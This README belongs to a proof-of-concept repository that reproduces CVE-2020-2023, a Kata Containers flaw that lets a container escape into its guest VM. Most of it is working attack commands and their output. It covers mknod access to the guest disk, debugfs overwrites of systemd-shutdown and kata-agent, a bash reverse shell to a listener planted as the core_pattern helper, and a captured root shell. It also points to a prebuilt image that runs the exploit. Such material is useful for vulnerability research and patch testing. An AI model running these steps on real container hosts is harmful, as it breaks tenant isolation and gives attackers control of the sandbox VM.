# kata-cve-2020-2023-poc
## 1. Reproduce Environment

> Note: The environment needs support KVM

https://github.com/ssst0n3/docker_archive/tree/branch_ubuntu-20.04_docker-ce-19.03.11_containerd.io-1.4.9_kata-1.11.0

```
$ git clone https://github.com/ssst0n3/docker_archive.git
$ cd docker_archive
$ git checkout branch_ubuntu-20.04_docker-ce-19.03.11_containerd.io-1.4.9_kata-1.11.0
$ docker compose -f docker-compose.yml up -d
# // wait for vm start, or use docker logs -f <CONTAINERID> to watch the starting progress.
$ ssh -p 2222 root@127.0.0.1
root@127.0.0.1's password: root
root@ubuntu:~# docker run --rm -ti --runtime kata-runtime ubuntu
root@17d02623cea7:/#
```

## 2. Reproduction

### 2.1 mknod to modify guest filesystem

```
root@ubuntu:~# docker run -ti --runtime kata-runtime ubuntu
root@a2a6f9a36c1b:/# lsblk
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
pmem0     259:0    0  126M  0 disk
`-pmem0p1 259:1    0  124M  0 part
root@a2a6f9a36c1b:/# mknod /dev/guest_hd b 259 1
root@a2a6f9a36c1b:/# debugfs -w /dev/guest_hd -R "ls -l /usr/bin" |grep kata
debugfs 1.46.5 (30-Dec-2021)
   1569  100755 (1)      0      0   26607184  8-May-2020 18:29 kata-agent
root@a2a6f9a36c1b:/# echo overwrite_guest > proof
root@a2a6f9a36c1b:/# debugfs -w /dev/guest_hd -R "write /proof /proof"
debugfs 1.46.5 (30-Dec-2021)
Allocated inode: 1317
root@a2a6f9a36c1b:/# debugfs -w /dev/guest_hd -R "cat /proof"
debugfs 1.46.5 (30-Dec-2021)
overwrite_guest
```
### 2.2 ctr escape to guest

I built an image ssst0n3/kata-cve-2020-2023-poc to exploit by one script.

```
root@ubuntu:~# docker run -ti --runtime kata-runtime ssst0n3/kata-cve-2020-2023-poc:v0.2.1
root@a9917a24ff3e:~# ./ssst0n3-core-pattern-escape-to-guest.sh
or
root@a9917a24ff3e:~# ./yuvalavra-overwrite-systemd-shutdown-escape-to-guest.sh
```

Below are the steps by manually:

#### 2.2.1 yuvalavra's method: mknod and overwrite systemd-shutdown

1. mknod to create guest filesystem
2. delete binary `umount`, to avoid the filesystems be umounted when systemd executes shutdown
3. replace systemd-shutdown as a malicious
4. replace kata-agent as garbage. If the environment supports DAX, we only need to write some data to trigger the update of kata-agent's code execution. As I tested, we need at most write 0xc40001 data. If the environment does not support DAX, we can exhausted memory to free PAGE CACHE.

```
root@ubuntu:~# docker run -ti --runtime kata-runtime ubuntu
root@3b597a4b67cf:/# apt update && apt install -y gcc
root@3b597a4b67cf:/# cat > proof.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    const char *filepath = "/run/kata-containers/shared/containers/guest_is_now_malicious";
    int fd;

    fd = open(filepath, O_CREAT | O_WRONLY, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
    close(fd);
    return 0;
}
EOF
root@3b597a4b67cf:/# gcc -static -o proof proof.c
root@3b597a4b67cf:/# chmod +x proof

root@3b597a4b67cf:/# lsblk
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
pmem0     259:0    0  126M  0 disk
`-pmem0p1 259:1    0  124M  0 part
root@3b597a4b67cf:/# mknod /dev/guest_hd b 259 1
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "rm /usr/bin/systemd-umount"
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "rm /usr/bin/umount"
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "rm /usr/lib/systemd/systemd-shutdown"
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "write /proof /usr/lib/systemd/systemd-shutdown"
root@3b597a4b67cf:/# head -c $((0xc4001)) < /dev/urandom > /garbage
root@3b597a4b67cf:/# chmod +x /garbage
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "rm /usr/bin/kata-agent"
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "write /garbage /usr/bin/kata-agent"
```

```
root@ubuntu:~# ls -lah /run/kata-containers/shared/sandboxes/3b597a4b67cf4747914985fdfdd6f0712c333543fe0bdcc65e8124573297d767/
total 12K
drwxr-x--- 3 root root 140 May  8 12:22 .
drwxr-x--- 3 root root  60 May  8 12:21 ..
drwxr-xr-x 3 root root  60 May  8 12:21 3b597a4b67cf4747914985fdfdd6f0712c333543fe0bdcc65e8124573297d767
-rw-r--r-- 1 root root  13 May  8 12:21 3b597a4b67cf4747914985fdfdd6f0712c333543fe0bdcc65e8124573297d767-369b9e66b099c8b0-hostname
-rw-r--r-- 1 root root 585 May  8 12:21 3b597a4b67cf4747914985fdfdd6f0712c333543fe0bdcc65e8124573297d767-68d270ffaf02ee23-resolv.conf
-rw-r--r-- 1 root root 174 May  8 12:21 3b597a4b67cf4747914985fdfdd6f0712c333543fe0bdcc65e8124573297d767-aa1d0b23d32fbffd-hosts
-rw-r--r-- 1 root root   0 May  8 12:22 guest_is_now_malicious
```

#### 2.2.2 ssst0n3's method: mknod and overwrite core_pattern

1. overwrite core_pattern binary to be a reverse shell
2. trigger SIGSEGV

```
root@ubuntu:~# docker run -ti --runtime kata-runtime ubuntu
root@3b597a4b67cf:/# cat > reverse_shell << EOF
#!/usr/bin/bash
bash -i >& /dev/tcp/172.17.0.1/2333 0>&1
EOF
root@3b597a4b67cf:/# chmod +x reverse_shell
root@3b597a4b67cf:/# cat /proc/sys/kernel/core_pattern
|/usr/lib/systemd/coredump-wrapper %E %P %u %g %s %t %c %h %e

root@3b597a4b67cf:/# lsblk
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
pmem0     259:0    0  126M  0 disk
`-pmem0p1 259:1    0  124M  0 part
root@3b597a4b67cf:/# mknod /dev/guest_hd b 259 1
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "rm /usr/lib/systemd/coredump-wrapper"
root@3b597a4b67cf:/# debugfs -w /dev/guest_hd -R "write /reverse_shell /usr/lib/systemd/coredump-wrapper"
root@3b597a4b67cf:/# sh -c 'kill -11 $$' &
```

```
root@ubuntu:~# nc -nlvp 2333
Listening on 0.0.0.0 2333
Connection received on 172.17.0.2 35948
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash: grep: command not found
bash: grep: command not found
bash: tty: command not found
bash: expr: command not found
bash: [: : integer expression expected
bash-5.0# mount
mount
/dev/pmem0p1 on / type ext4 (ro,relatime,dax,errors=remount-ro,data=ordered)
devtmpfs on /dev type devtmpfs (rw,relatime,size=1019924k,nr_inodes=254981,mode=755)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,noexec)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
none on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,nosuid,nodev,noexec,relatime,pagesize=2M)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
tmpfs on /etc/machine-id type tmpfs (ro,mode=755)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev)
nsfs on /run/sandbox-ns/ipc type nsfs (rw)
nsfs on /run/sandbox-ns/uts type nsfs (rw)
kataShared on /run/kata-containers/shared/containers type 9p (rw,nodev,relatime,dirsync,mmap,access=client,trans=virtio)
shm on /run/kata-containers/sandbox/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
tmpfs on /etc/resolv.conf type tmpfs (rw,nosuid,nodev,mode=755)
```
